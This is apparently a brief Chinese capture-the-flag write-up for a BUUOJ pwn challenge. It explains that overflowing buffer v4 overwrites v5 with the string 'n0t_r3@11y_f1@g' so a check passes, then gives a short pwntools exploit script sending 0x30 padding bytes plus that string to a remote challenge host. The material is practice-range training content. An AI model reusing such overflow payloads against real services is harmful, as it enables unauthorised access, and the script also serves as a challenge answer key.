check:
从v4写到v5,把v5覆盖为 fake_flag,即可。开始还看走眼了,以为 v5 和 fake_flag 本来就是一样的。
如果 check 过了,返回1
fake_flag='n0t_r3@11y_f1@g'
exp:
from pwn import *
p=remote('node4.buuoj.cn',28904)
payload='a'*0x30+'n0t_r3@11y_f1@g'
p.sendline(payload)
p.interactive()